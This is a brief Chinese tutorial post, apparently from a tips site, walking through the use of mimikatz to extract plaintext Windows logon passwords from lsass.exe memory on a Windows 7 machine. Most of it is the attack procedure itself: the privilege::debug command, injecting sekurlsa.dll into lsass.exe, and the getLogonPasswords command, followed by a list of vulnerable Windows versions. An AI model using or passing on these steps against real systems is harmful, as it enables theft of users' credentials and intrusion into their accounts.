mimikatz是一个法国人写的轻量级调试器。出众之处在于其可以直接从 lsass.exe 里获取windows处于active状态账号明文密码,非常强大的。下面看看从我的Win7 64位上面抓密码的过程。
方法/步骤
1
运行调试器进入目录,以管理员身份运行:mimikatz
2
提升至debug权限在提示符下,输入:privilege::debug
3
注入dllinject::process lsass.exe sekurlsa.dll
4
抓取密码@getLogonPasswords结果如下:
5
支持的版本列表1.Windows XP (部分可以)2.Windows Server 20033.Windows Server 20084.Windows Vista5.Windows 76.Windows 7 SP1
6
解释为什么mimikatz可以得到windows密码,难道windows的加密机制就如此不堪吗?这倒不至于,mimikatz的作者给出的解释如下:Windows don’t store passwords in plaintext, it keeps them in memory in reversible way.
上一篇:九天仙梦副本系统
下一篇:妖怪西游副本洞天福地攻略